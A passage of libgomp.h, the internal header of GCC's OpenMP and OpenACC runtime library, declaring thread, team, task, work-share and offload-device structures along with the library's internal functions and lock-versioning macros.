Libgomp is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for
more details.
Under Section 7 of GPL version 3, you are granted additional
permissions described in the GCC Runtime Library Exception, version
3.1, as published by the Free Software Foundation.
You should have received a copy of the GNU General Public License and
a copy of the GCC Runtime Library Exception along with this program;
see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
<http://www.gnu.org/licenses/>. */
/* This file contains data types and function declarations that are not
part of the official OpenACC or OpenMP user interfaces. There are
declarations in here that are part of the GNU Offloading and Multi
Processing ABI, in that the compiler is required to know about them
and use them.
The convention is that the all caps prefix "GOMP" is used group items
that are part of the external ABI, and the lower case prefix "gomp"
is used group items that are completely private to the library. */
#ifndef LIBGOMP_H
#define LIBGOMP_H 1
#ifndef _LIBGOMP_CHECKING_
/* Define to 1 to perform internal sanity checks. */
#define _LIBGOMP_CHECKING_ 0
#endif
#include "config.h"
#include "gstdint.h"
#include "libgomp-plugin.h"
#ifdef HAVE_PTHREAD_H
#include <pthread.h>
#endif
#include <stdbool.h>
#include <stdlib.h>
#include <stdarg.h>
/* Needed for memset in priority_queue.c. */
#if _LIBGOMP_CHECKING_
# ifdef STRING_WITH_STRINGS
# include <string.h>
# include <strings.h>
# else
# ifdef HAVE_STRING_H
# include <string.h>
# else
# ifdef HAVE_STRINGS_H
# include <strings.h>
# endif
# endif
# endif
#endif
#ifdef HAVE_ATTRIBUTE_VISIBILITY
# pragma GCC visibility push(hidden)
#endif
/* If we were a C++ library, we'd get this from <std/atomic>. */
enum memmodel
{
MEMMODEL_RELAXED = 0,
MEMMODEL_CONSUME = 1,
MEMMODEL_ACQUIRE = 2,
MEMMODEL_RELEASE = 3,
MEMMODEL_ACQ_REL = 4,
MEMMODEL_SEQ_CST = 5
};
/* alloc.c */
extern void *gomp_malloc (size_t) __attribute__((malloc));
extern void *gomp_malloc_cleared (size_t) __attribute__((malloc));
extern void *gomp_realloc (void *, size_t);
/* Avoid conflicting prototypes of alloca() in system headers by using
GCC's builtin alloca(). */
#define gomp_alloca(x) __builtin_alloca(x)
/* error.c */
extern void gomp_vdebug (int, const char *, va_list);
extern void gomp_debug (int, const char *, ...)
__attribute__ ((format (printf, 2, 3)));
#define gomp_vdebug(KIND, FMT, VALIST) \
do { \
if (__builtin_expect (gomp_debug_var, 0)) \
(gomp_vdebug) ((KIND), (FMT), (VALIST)); \
} while (0)
#define gomp_debug(KIND, ...) \
do { \
if (__builtin_expect (gomp_debug_var, 0)) \
(gomp_debug) ((KIND), __VA_ARGS__); \
} while (0)
extern void gomp_verror (const char *, va_list);
extern void gomp_error (const char *, ...)
__attribute__ ((format (printf, 1, 2)));
extern void gomp_vfatal (const char *, va_list)
__attribute__ ((noreturn));
extern void gomp_fatal (const char *, ...)
__attribute__ ((noreturn, format (printf, 1, 2)));
struct gomp_task;
struct gomp_taskgroup;
struct htab;
#include "priority_queue.h"
#include "sem.h"
#include "mutex.h"
#include "bar.h"
#include "simple-bar.h"
#include "ptrlock.h"
/* This structure contains the data to control one work-sharing construct,
either a LOOP (FOR/DO) or a SECTIONS. */
enum gomp_schedule_type
{
GFS_RUNTIME,
GFS_STATIC,
GFS_DYNAMIC,
GFS_GUIDED,
GFS_AUTO
};
struct gomp_doacross_work_share
{
union {
/* chunk_size copy, as ws->chunk_size is multiplied by incr for
GFS_DYNAMIC. */
long chunk_size;
/* Likewise, but for ull implementation. */
unsigned long long chunk_size_ull;
/* For schedule(static,0) this is the number
of iterations assigned to the last thread, i.e. number of
iterations / number of threads. */
long q;
/* Likewise, but for ull implementation. */
unsigned long long q_ull;
};
/* Size of each array entry (padded to cache line size). */
unsigned long elt_sz;
/* Number of dimensions in sink vectors. */
unsigned int ncounts;
/* True if the iterations can be flattened. */
bool flattened;
/* Actual array (of elt_sz sized units), aligned to cache line size.
This is indexed by team_id for GFS_STATIC and outermost iteration
/ chunk_size for other schedules. */
unsigned char *array;
/* These two are only used for schedule(static,0). */
/* This one is number of iterations % number of threads. */
long t;
union {
/* And this one is cached t * (q + 1). */
long boundary;
/* Likewise, but for the ull implementation. */
unsigned long long boundary_ull;
};
/* Array of shift counts for each dimension if they can be flattened. */
unsigned int shift_counts[];
};
struct gomp_work_share
{
/* This member records the SCHEDULE clause to be used for this construct.
The user specification of "runtime" will already have been resolved.
If this is a SECTIONS construct, this value will always be DYNAMIC. */
enum gomp_schedule_type sched;
int mode;
union {
struct {
/* This is the chunk_size argument to the SCHEDULE clause. */
long chunk_size;
/* This is the iteration end point. If this is a SECTIONS construct,
this is the number of contained sections. */
long end;
/* This is the iteration step. If this is a SECTIONS construct, this
is always 1. */
long incr;
};
struct {
/* The same as above, but for the unsigned long long loop variants. */
unsigned long long chunk_size_ull;
unsigned long long end_ull;
unsigned long long incr_ull;
};
};
union {
/* This is a circular queue that details which threads will be allowed
into the ordered region and in which order. When a thread allocates
iterations on which it is going to work, it also registers itself at
the end of the array. When a thread reaches the ordered region, it
checks to see if it is the one at the head of the queue. If not, it
blocks on its RELEASE semaphore. */
unsigned *ordered_team_ids;
/* This is a pointer to DOACROSS work share data. */
struct gomp_doacross_work_share *doacross;
};
/* This is the number of threads that have registered themselves in
the circular queue ordered_team_ids. */
unsigned ordered_num_used;
/* This is the team_id of the currently acknowledged owner of the ordered
section, or -1u if the ordered section has not been acknowledged by
any thread. This is distinguished from the thread that is *allowed*
to take the section next. */
unsigned ordered_owner;
/* This is the index into the circular queue ordered_team_ids of the
current thread that's allowed into the ordered reason. */
unsigned ordered_cur;
/* This is a chain of allocated gomp_work_share blocks, valid only
in the first gomp_work_share struct in the block. */
struct gomp_work_share *next_alloc;
/* The above fields are written once during workshare initialization,
or related to ordered worksharing. Make sure the following fields
are in a different cache line. */
/* This lock protects the update of the following members. */
gomp_mutex_t lock __attribute__((aligned (64)));
/* This is the count of the number of threads that have exited the work
share construct. If the construct was marked nowait, they have moved on
to other work; otherwise they're blocked on a barrier. The last member
of the team to exit the work share construct must deallocate it. */
unsigned threads_completed;
union {
/* This is the next iteration value to be allocated. In the case of
GFS_STATIC loops, this the iteration start point and never changes. */
long next;
/* The same, but with unsigned long long type. */
unsigned long long next_ull;
/* This is the returned data structure for SINGLE COPYPRIVATE. */
void *copyprivate;
};
union {
/* Link to gomp_work_share struct for next work sharing construct
encountered after this one. */
gomp_ptrlock_t next_ws;
/* gomp_work_share structs are chained in the free work share cache
through this. */
struct gomp_work_share *next_free;
};
/* If only few threads are in the team, ordered_team_ids can point
to this array which fills the padding at the end of this struct. */
unsigned inline_ordered_team_ids[0];
};
/* This structure contains all of the thread-local data associated with
a thread team. This is the data that must be saved when a thread
encounters a nested PARALLEL construct. */
struct gomp_team_state
{
/* This is the team of which the thread is currently a member. */
struct gomp_team *team;
/* This is the work share construct which this thread is currently
processing. Recall that with NOWAIT, not all threads may be
processing the same construct. */
struct gomp_work_share *work_share;
/* This is the previous work share construct or NULL if there wasn't any.
When all threads are done with the current work sharing construct,
the previous one can be freed. The current one can't, as its
next_ws field is used. */
struct gomp_work_share *last_work_share;
/* This is the ID of this thread within the team. This value is
guaranteed to be between 0 and N-1, where N is the number of
threads in the team. */
unsigned team_id;
/* Nesting level. */
unsigned level;
/* Active nesting level. Only active parallel regions are counted. */
unsigned active_level;
/* Place-partition-var, offset and length into gomp_places_list array. */
unsigned place_partition_off;
unsigned place_partition_len;
#ifdef HAVE_SYNC_BUILTINS
/* Number of single stmts encountered. */
unsigned long single_count;
#endif
/* For GFS_RUNTIME loops that resolved to GFS_STATIC, this is the
trip number through the loop. So first time a particular loop
is encountered this number is 0, the second time through the loop
is 1, etc. This is unused when the compiler knows in advance that
the loop is statically scheduled. */
unsigned long static_trip;
};
struct target_mem_desc;
/* These are the OpenMP 4.0 Internal Control Variables described in
section 2.3.1. Those described as having one copy per task are
stored within the structure; those described as having one copy
for the whole program are (naturally) global variables. */
struct gomp_task_icv
{
unsigned long nthreads_var;
enum gomp_schedule_type run_sched_var;
int run_sched_chunk_size;
int default_device_var;
unsigned int thread_limit_var;
bool dyn_var;
bool nest_var;
char bind_var;
/* Internal ICV. */
struct target_mem_desc *target_data;
};
extern struct gomp_task_icv gomp_global_icv;
#ifndef HAVE_SYNC_BUILTINS
extern gomp_mutex_t gomp_managed_threads_lock;
#endif
extern unsigned long gomp_max_active_levels_var;
extern bool gomp_cancel_var;
extern int gomp_max_task_priority_var;
extern unsigned long long gomp_spin_count_var, gomp_throttled_spin_count_var;
extern unsigned long gomp_available_cpus, gomp_managed_threads;
extern unsigned long *gomp_nthreads_var_list, gomp_nthreads_var_list_len;
extern char *gomp_bind_var_list;
extern unsigned long gomp_bind_var_list_len;
extern void **gomp_places_list;
extern unsigned long gomp_places_list_len;
extern unsigned int gomp_num_teams_var;
extern int gomp_debug_var;
extern int goacc_device_num;
extern char *goacc_device_type;
enum gomp_task_kind
{
/* Implicit task. */
GOMP_TASK_IMPLICIT,
/* Undeferred task. */
GOMP_TASK_UNDEFERRED,
/* Task created by GOMP_task and waiting to be run. */
GOMP_TASK_WAITING,
/* Task currently executing or scheduled and about to execute. */
GOMP_TASK_TIED,
/* Used for target tasks that have vars mapped and async run started,
but not yet completed. Once that completes, they will be readded
into the queues as GOMP_TASK_WAITING in order to perform the var
unmapping. */
GOMP_TASK_ASYNC_RUNNING
};
struct gomp_task_depend_entry
{
/* Address of dependency. */
void *addr;
struct gomp_task_depend_entry *next;
struct gomp_task_depend_entry *prev;
/* Task that provides the dependency in ADDR. */
struct gomp_task *task;
/* Depend entry is of type "IN". */
bool is_in;
bool redundant;
bool redundant_out;
};
struct gomp_dependers_vec
{
size_t n_elem;
size_t allocated;
struct gomp_task *elem[];
};
/* Used when in GOMP_taskwait or in gomp_task_maybe_wait_for_dependencies. */
struct gomp_taskwait
{
bool in_taskwait;
bool in_depend_wait;
/* Number of tasks we are waiting for. */
size_t n_depend;
gomp_sem_t taskwait_sem;
};
/* This structure describes a "task" to be run by a thread. */
struct gomp_task
{
/* Parent of this task. */
struct gomp_task *parent;
/* Children of this task. */
struct priority_queue children_queue;
/* Taskgroup this task belongs in. */
struct gomp_taskgroup *taskgroup;
/* Tasks that depend on this task. */
struct gomp_dependers_vec *dependers;
struct htab *depend_hash;
struct gomp_taskwait *taskwait;
/* Number of items in DEPEND. */
size_t depend_count;
/* Number of tasks this task depends on. Once this counter reaches
0, we have no unsatisfied dependencies, and this task can be put
into the various queues to be scheduled. */
size_t num_dependees;
/* Priority of this task. */
int priority;
/* The priority node for this task in each of the different queues.
We put this here to avoid allocating space for each priority
node. Then we play offsetof() games to convert between pnode[]
entries and the gomp_task in which they reside. */
struct priority_node pnode[3];
struct gomp_task_icv icv;
void (*fn) (void *);
void *fn_data;
enum gomp_task_kind kind;
bool in_tied_task;
bool final_task;
bool copy_ctors_done;
/* Set for undeferred tasks with unsatisfied dependencies which
block further execution of their parent until the dependencies
are satisfied. */
bool parent_depends_on;
/* Dependencies provided and/or needed for this task. DEPEND_COUNT
is the number of items available. */
struct gomp_task_depend_entry depend[];
};
/* This structure describes a single #pragma omp taskgroup. */
struct gomp_taskgroup
{
struct gomp_taskgroup *prev;
/* Queue of tasks that belong in this taskgroup. */
struct priority_queue taskgroup_queue;
bool in_taskgroup_wait;
bool cancelled;
gomp_sem_t taskgroup_sem;
size_t num_children;
};
/* Various state of OpenMP async offloading tasks. */
enum gomp_target_task_state
{
GOMP_TARGET_TASK_DATA,
GOMP_TARGET_TASK_BEFORE_MAP,
GOMP_TARGET_TASK_FALLBACK,
GOMP_TARGET_TASK_READY_TO_RUN,
GOMP_TARGET_TASK_RUNNING,
GOMP_TARGET_TASK_FINISHED
};
/* This structure describes a target task. */
struct gomp_target_task
{
struct gomp_device_descr *devicep;
void (*fn) (void *);
size_t mapnum;
size_t *sizes;
unsigned short *kinds;
unsigned int flags;
enum gomp_target_task_state state;
struct target_mem_desc *tgt;
struct gomp_task *task;
struct gomp_team *team;
/* Device-specific target arguments. */
void **args;
void *hostaddrs[];
};
/* This structure describes a "team" of threads. These are the threads
that are spawned by a PARALLEL constructs, as well as the work sharing
constructs that the team encounters. */
struct gomp_team
{
/* This is the number of threads in the current team. */
unsigned nthreads;
/* This is number of gomp_work_share structs that have been allocated
as a block last time. */
unsigned work_share_chunk;
/* This is the saved team state that applied to a master thread before
the current thread was created. */
struct gomp_team_state prev_ts;
/* This semaphore should be used by the master thread instead of its
"native" semaphore in the thread structure. Required for nested
parallels, as the master is a member of two teams. */
gomp_sem_t master_release;
/* This points to an array with pointers to the release semaphore
of the threads in the team. */
gomp_sem_t **ordered_release;
/* List of work shares on which gomp_fini_work_share hasn't been
called yet. If the team hasn't been cancelled, this should be
equal to each thr->ts.work_share, but otherwise it can be a possibly
long list of workshares. */
struct gomp_work_share *work_shares_to_free;
/* List of gomp_work_share structs chained through next_free fields.
This is populated and taken off only by the first thread in the
team encountering a new work sharing construct, in a critical
section. */
struct gomp_work_share *work_share_list_alloc;
/* List of gomp_work_share structs freed by free_work_share. New
entries are atomically added to the start of the list, and
alloc_work_share can safely only move all but the first entry
to work_share_list alloc, as free_work_share can happen concurrently
with alloc_work_share. */
struct gomp_work_share *work_share_list_free;
#ifdef HAVE_SYNC_BUILTINS
/* Number of simple single regions encountered by threads in this
team. */
unsigned long single_count;
#else
/* Mutex protecting addition of workshares to work_share_list_free. */
gomp_mutex_t work_share_list_free_lock;
#endif
/* This barrier is used for most synchronization of the team. */
gomp_barrier_t barrier;
/* Initial work shares, to avoid allocating any gomp_work_share
structs in the common case. */
struct gomp_work_share work_shares[8];
gomp_mutex_t task_lock;
/* Scheduled tasks. */
struct priority_queue task_queue;
/* Number of all GOMP_TASK_{WAITING,TIED} tasks in the team. */
unsigned int task_count;
/* Number of GOMP_TASK_WAITING tasks currently waiting to be scheduled. */
unsigned int task_queued_count;
/* Number of GOMP_TASK_{WAITING,TIED} tasks currently running
directly in gomp_barrier_handle_tasks; tasks spawned
from e.g. GOMP_taskwait or GOMP_taskgroup_end don't count, even when
that is called from a task run from gomp_barrier_handle_tasks.
task_running_count should be always <= team->nthreads,
and if current task isn't in_tied_task, then it will be
even < team->nthreads. */
unsigned int task_running_count;
int work_share_cancelled;
int team_cancelled;
/* This array contains structures for implicit tasks. */
struct gomp_task implicit_task[];
};
/* This structure contains all data that is private to libgomp and is
allocated per thread. */
struct gomp_thread
{
/* This is the function that the thread should run upon launch. */
void (*fn) (void *data);
void *data;
/* This is the current team state for this thread. The ts.team member
is NULL only if the thread is idle. */
struct gomp_team_state ts;
/* This is the task that the thread is currently executing. */
struct gomp_task *task;
/* This semaphore is used for ordered loops. */
gomp_sem_t release;
/* Place this thread is bound to plus one, or zero if not bound
to any place. */
unsigned int place;
/* User pthread thread pool */
struct gomp_thread_pool *thread_pool;
};
struct gomp_thread_pool
{
/* This array manages threads spawned from the top level, which will
return to the idle loop once the current PARALLEL construct ends. */
struct gomp_thread **threads;
unsigned threads_size;
unsigned threads_used;
/* The last team is used for non-nested teams to delay their destruction to
make sure all the threads in the team move on to the pool's barrier before
the team's barrier is destroyed. */
struct gomp_team *last_team;
/* Number of threads running in this contention group. */
unsigned long threads_busy;
/* This barrier holds and releases threads waiting in thread pools. */
gomp_simple_barrier_t threads_dock;
};
enum gomp_cancel_kind
{
GOMP_CANCEL_PARALLEL = 1,
GOMP_CANCEL_LOOP = 2,
GOMP_CANCEL_FOR = GOMP_CANCEL_LOOP,
GOMP_CANCEL_DO = GOMP_CANCEL_LOOP,
GOMP_CANCEL_SECTIONS = 4,
GOMP_CANCEL_TASKGROUP = 8
};
/* ... and here is that TLS data. */
#if defined __nvptx__
extern struct gomp_thread *nvptx_thrs __attribute__((shared));
static inline struct gomp_thread *gomp_thread (void)
{
int tid;
asm ("mov.u32 %0, %%tid.y;" : "=r" (tid));
return nvptx_thrs + tid;
}
#elif defined HAVE_TLS || defined USE_EMUTLS
extern __thread struct gomp_thread gomp_tls_data;
static inline struct gomp_thread *gomp_thread (void)
{
return &gomp_tls_data;
}
#else
extern pthread_key_t gomp_tls_key;
static inline struct gomp_thread *gomp_thread (void)
{
return pthread_getspecific (gomp_tls_key);
}
#endif
extern struct gomp_task_icv *gomp_new_icv (void);
/* Here's how to access the current copy of the ICVs. */
static inline struct gomp_task_icv *gomp_icv (bool write)
{
struct gomp_task *task = gomp_thread ()->task;
if (task)
return &task->icv;
else if (write)
return gomp_new_icv ();
else
return &gomp_global_icv;
}
#ifdef LIBGOMP_USE_PTHREADS
/* The attributes to be used during thread creation. */
extern pthread_attr_t gomp_thread_attr;
extern pthread_key_t gomp_thread_destructor;
#endif
/* Function prototypes. */
/* affinity.c */
extern void gomp_init_affinity (void);
#ifdef LIBGOMP_USE_PTHREADS
extern void gomp_init_thread_affinity (pthread_attr_t *, unsigned int);
#endif
extern void **gomp_affinity_alloc (unsigned long, bool);
extern void gomp_affinity_init_place (void *);
extern bool gomp_affinity_add_cpus (void *, unsigned long, unsigned long,
long, bool);
extern bool gomp_affinity_remove_cpu (void *, unsigned long);
extern bool gomp_affinity_copy_place (void *, void *, long);
extern bool gomp_affinity_same_place (void *, void *);
extern bool gomp_affinity_finalize_place_list (bool);
extern bool gomp_affinity_init_level (int, unsigned long, bool);
extern void gomp_affinity_print_place (void *);
extern void gomp_get_place_proc_ids_8 (int, int64_t *);
/* iter.c */
extern int gomp_iter_static_next (long *, long *);
extern bool gomp_iter_dynamic_next_locked (long *, long *);
extern bool gomp_iter_guided_next_locked (long *, long *);
#ifdef HAVE_SYNC_BUILTINS
extern bool gomp_iter_dynamic_next (long *, long *);
extern bool gomp_iter_guided_next (long *, long *);
#endif
/* iter_ull.c */
extern int gomp_iter_ull_static_next (unsigned long long *,
unsigned long long *);
extern bool gomp_iter_ull_dynamic_next_locked (unsigned long long *,
unsigned long long *);
extern bool gomp_iter_ull_guided_next_locked (unsigned long long *,
unsigned long long *);
#if defined HAVE_SYNC_BUILTINS && defined __LP64__
extern bool gomp_iter_ull_dynamic_next (unsigned long long *,
unsigned long long *);
extern bool gomp_iter_ull_guided_next (unsigned long long *,
unsigned long long *);
#endif
/* ordered.c */
extern void gomp_ordered_first (void);
extern void gomp_ordered_last (void);
extern void gomp_ordered_next (void);
extern void gomp_ordered_static_init (void);
extern void gomp_ordered_static_next (void);
extern void gomp_ordered_sync (void);
extern void gomp_doacross_init (unsigned, long *, long);
extern void gomp_doacross_ull_init (unsigned, unsigned long long *,
unsigned long long);
/* parallel.c */
extern unsigned gomp_resolve_num_threads (unsigned, unsigned);
/* proc.c (in config/) */
extern void gomp_init_num_threads (void);
extern unsigned gomp_dynamic_max_threads (void);
/* task.c */
extern void gomp_init_task (struct gomp_task *, struct gomp_task *,
struct gomp_task_icv *);
extern void gomp_end_task (void);
extern void gomp_barrier_handle_tasks (gomp_barrier_state_t);
extern void gomp_task_maybe_wait_for_dependencies (void **);
extern bool gomp_create_target_task (struct gomp_device_descr *,
void (*) (void *), size_t, void **,
size_t *, unsigned short *, unsigned int,
void **, void **,
enum gomp_target_task_state);
static void inline
gomp_finish_task (struct gomp_task *task)
{
if (__builtin_expect (task->depend_hash != NULL, 0))
free (task->depend_hash);
}
/* team.c */
extern struct gomp_team *gomp_new_team (unsigned);
extern void gomp_team_start (void (*) (void *), void *, unsigned,
unsigned, struct gomp_team *);
extern void gomp_team_end (void);
extern void gomp_free_thread (void *);
/* target.c */
extern void gomp_init_targets_once (void);
extern int gomp_get_num_devices (void);
extern bool gomp_target_task_fn (void *);
/* Splay tree definitions. */
typedef struct splay_tree_node_s *splay_tree_node;
typedef struct splay_tree_s *splay_tree;
typedef struct splay_tree_key_s *splay_tree_key;
struct target_var_desc {
/* Splay key. */
splay_tree_key key;
/* True if data should be copied from device to host at the end. */
bool copy_from;
/* True if data always should be copied from device to host at the end. */
bool always_copy_from;
/* Relative offset against key host_start. */
uintptr_t offset;
/* Actual length. */
uintptr_t length;
};
struct target_mem_desc {
/* Reference count. */
uintptr_t refcount;
/* All the splay nodes allocated together. */
splay_tree_node array;
/* Start of the target region. */
uintptr_t tgt_start;
/* End of the targer region. */
uintptr_t tgt_end;
/* Handle to free. */
void *to_free;
/* Previous target_mem_desc. */
struct target_mem_desc *prev;
/* Number of items in following list. */
size_t list_count;
/* Corresponding target device descriptor. */
struct gomp_device_descr *device_descr;
/* List of target items to remove (or decrease refcount)
at the end of region. */
struct target_var_desc list[];
};
/* Special value for refcount - infinity. */
#define REFCOUNT_INFINITY (~(uintptr_t) 0)
/* Special value for refcount - tgt_offset contains target address of the
artificial pointer to "omp declare target link" object. */
#define REFCOUNT_LINK (~(uintptr_t) 1)
struct splay_tree_key_s {
/* Address of the host object. */
uintptr_t host_start;
/* Address immediately after the host object. */
uintptr_t host_end;
/* Descriptor of the target memory. */
struct target_mem_desc *tgt;
/* Offset from tgt->tgt_start to the start of the target object. */
uintptr_t tgt_offset;
/* Reference count. */
uintptr_t refcount;
/* Pointer to the original mapping of "omp declare target link" object. */
splay_tree_key link_key;
};
/* The comparison function. */
static inline int
splay_compare (splay_tree_key x, splay_tree_key y)
{
if (x->host_start == x->host_end
&& y->host_start == y->host_end)
return 0;
if (x->host_end <= y->host_start)
return -1;
if (x->host_start >= y->host_end)
return 1;
return 0;
}
#include "splay-tree.h"
typedef struct acc_dispatch_t
{
/* This is a linked list of data mapped using the
acc_map_data/acc_unmap_data or "acc enter data"/"acc exit data" pragmas.
Unlike mapped_data in the goacc_thread struct, unmapping can
happen out-of-order with respect to mapping. */
/* This is guarded by the lock in the "outer" struct gomp_device_descr. */
struct target_mem_desc *data_environ;
/* Execute. */
__typeof (GOMP_OFFLOAD_openacc_exec) *exec_func;
/* Async cleanup callback registration. */
__typeof (GOMP_OFFLOAD_openacc_register_async_cleanup)
*register_async_cleanup_func;
/* Asynchronous routines. */
__typeof (GOMP_OFFLOAD_openacc_async_test) *async_test_func;
__typeof (GOMP_OFFLOAD_openacc_async_test_all) *async_test_all_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait) *async_wait_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait_async) *async_wait_async_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait_all) *async_wait_all_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait_all_async)
*async_wait_all_async_func;
__typeof (GOMP_OFFLOAD_openacc_async_set_async) *async_set_async_func;
/* Create/destroy TLS data. */
__typeof (GOMP_OFFLOAD_openacc_create_thread_data) *create_thread_data_func;
__typeof (GOMP_OFFLOAD_openacc_destroy_thread_data)
*destroy_thread_data_func;
/* NVIDIA target specific routines. */
struct {
__typeof (GOMP_OFFLOAD_openacc_cuda_get_current_device)
*get_current_device_func;
__typeof (GOMP_OFFLOAD_openacc_cuda_get_current_context)
*get_current_context_func;
__typeof (GOMP_OFFLOAD_openacc_cuda_get_stream) *get_stream_func;
__typeof (GOMP_OFFLOAD_openacc_cuda_set_stream) *set_stream_func;
} cuda;
} acc_dispatch_t;
/* Various state of the accelerator device. */
enum gomp_device_state
{
GOMP_DEVICE_UNINITIALIZED,
GOMP_DEVICE_INITIALIZED,
GOMP_DEVICE_FINALIZED
};
/* This structure describes accelerator device.
It contains name of the corresponding libgomp plugin, function handlers for
interaction with the device, ID-number of the device, and information about
mapped memory. */
struct gomp_device_descr
{
/* Immutable data, which is only set during initialization, and which is not
guarded by the lock. */
/* The name of the device. */
const char *name;
/* Capabilities of device (supports OpenACC, OpenMP). */
unsigned int capabilities;
/* This is the ID number of device among devices of the same type. */
int target_id;
/* This is the TYPE of device. */
enum offload_target_type type;
/* Function handlers. */
__typeof (GOMP_OFFLOAD_get_name) *get_name_func;
__typeof (GOMP_OFFLOAD_get_caps) *get_caps_func;
__typeof (GOMP_OFFLOAD_get_type) *get_type_func;
__typeof (GOMP_OFFLOAD_get_num_devices) *get_num_devices_func;
__typeof (GOMP_OFFLOAD_init_device) *init_device_func;
__typeof (GOMP_OFFLOAD_fini_device) *fini_device_func;
__typeof (GOMP_OFFLOAD_version) *version_func;
__typeof (GOMP_OFFLOAD_load_image) *load_image_func;
__typeof (GOMP_OFFLOAD_unload_image) *unload_image_func;
__typeof (GOMP_OFFLOAD_alloc) *alloc_func;
__typeof (GOMP_OFFLOAD_free) *free_func;
__typeof (GOMP_OFFLOAD_dev2host) *dev2host_func;
__typeof (GOMP_OFFLOAD_host2dev) *host2dev_func;
__typeof (GOMP_OFFLOAD_dev2dev) *dev2dev_func;
__typeof (GOMP_OFFLOAD_can_run) *can_run_func;
__typeof (GOMP_OFFLOAD_run) *run_func;
__typeof (GOMP_OFFLOAD_async_run) *async_run_func;
/* Splay tree containing information about mapped memory regions. */
struct splay_tree_s mem_map;
/* Mutex for the mutable data. */
gomp_mutex_t lock;
/* Current state of the device. OpenACC allows to move from INITIALIZED state
back to UNINITIALIZED state. OpenMP allows only to move from INITIALIZED
to FINALIZED state (at program shutdown). */
enum gomp_device_state state;
/* OpenACC-specific data and functions. */
/* This is mutable because of its mutable data_environ and target_data
members. */
acc_dispatch_t openacc;
};
/* Kind of the pragma, for which gomp_map_vars () is called. */
enum gomp_map_vars_kind
{
GOMP_MAP_VARS_OPENACC,
GOMP_MAP_VARS_TARGET,
GOMP_MAP_VARS_DATA,
GOMP_MAP_VARS_ENTER_DATA
};
extern void gomp_acc_insert_pointer (size_t, void **, size_t *, void *);
extern void gomp_acc_remove_pointer (void *, bool, int, int);
extern struct target_mem_desc *gomp_map_vars (struct gomp_device_descr *,
size_t, void **, void **,
size_t *, void *, bool,
enum gomp_map_vars_kind);
extern void gomp_unmap_vars (struct target_mem_desc *, bool);
extern void gomp_init_device (struct gomp_device_descr *);
extern void gomp_free_memmap (struct splay_tree_s *);
extern void gomp_unload_device (struct gomp_device_descr *);
/* work.c */
extern void gomp_init_work_share (struct gomp_work_share *, bool, unsigned);
extern void gomp_fini_work_share (struct gomp_work_share *);
extern bool gomp_work_share_start (bool);
extern void gomp_work_share_end (void);
extern bool gomp_work_share_end_cancel (void);
extern void gomp_work_share_end_nowait (void);
static inline void
gomp_work_share_init_done (void)
{
struct gomp_thread *thr = gomp_thread ();
if (__builtin_expect (thr->ts.last_work_share != NULL, 1))
gomp_ptrlock_set (&thr->ts.last_work_share->next_ws, thr->ts.work_share);
}
#ifdef HAVE_ATTRIBUTE_VISIBILITY
# pragma GCC visibility pop
#endif
/* Now that we're back to default visibility, include the globals. */
#include "libgomp_g.h"
/* Include omp.h by parts. */
#include "omp-lock.h"
#define _LIBGOMP_OMP_LOCK_DEFINED 1
#include "omp.h.in"
#if !defined (HAVE_ATTRIBUTE_VISIBILITY) \
|| !defined (HAVE_ATTRIBUTE_ALIAS) \
|| !defined (HAVE_AS_SYMVER_DIRECTIVE) \
|| !defined (PIC) \
|| !defined (HAVE_SYMVER_SYMBOL_RENAMING_RUNTIME_SUPPORT)
# undef LIBGOMP_GNU_SYMBOL_VERSIONING
#endif
#ifdef LIBGOMP_GNU_SYMBOL_VERSIONING
extern void gomp_init_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_destroy_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_set_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_unset_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern int gomp_test_lock_30 (omp_lock_t *) __GOMP_NOTHROW;
extern void gomp_init_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_destroy_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_set_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_unset_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern int gomp_test_nest_lock_30 (omp_nest_lock_t *) __GOMP_NOTHROW;
extern void gomp_init_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_destroy_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_set_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_unset_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern int gomp_test_lock_25 (omp_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_init_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_destroy_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_set_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern void gomp_unset_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
extern int gomp_test_nest_lock_25 (omp_nest_lock_25_t *) __GOMP_NOTHROW;
# define omp_lock_symver(fn) \
__asm (".symver g" #fn "_30, " #fn "@@OMP_3.0"); \
__asm (".symver g" #fn "_25, " #fn "@OMP_1.0");
#else
# define gomp_init_lock_30 omp_init_lock
# define gomp_destroy_lock_30 omp_destroy_lock
# define gomp_set_lock_30 omp_set_lock
# define gomp_unset_lock_30 omp_unset_lock
# define gomp_test_lock_30 omp_test_lock
# define gomp_init_nest_lock_30 omp_init_nest_lock
# define gomp_destroy_nest_lock_30 omp_destroy_nest_lock
# define gomp_set_nest_lock_30 omp_set_nest_lock
# define gomp_unset_nest_lock_30 omp_unset_nest_lock
# define gomp_test_nest_lock_30 omp_test_nest_lock
#endif
#ifdef HAVE_ATTRIBUTE_VISIBILITY
# define attribute_hidden __attribute__ ((visibility ("hidden")))
#else
# define attribute_hidden
#endif
#ifdef HAVE_ATTRIBUTE_ALIAS
# define strong_alias(fn, al) \
extern __typeof (fn) al __attribute__ ((alias (#fn)));
# define ialias_ulp ialias_str1(__USER_LABEL_PREFIX__)
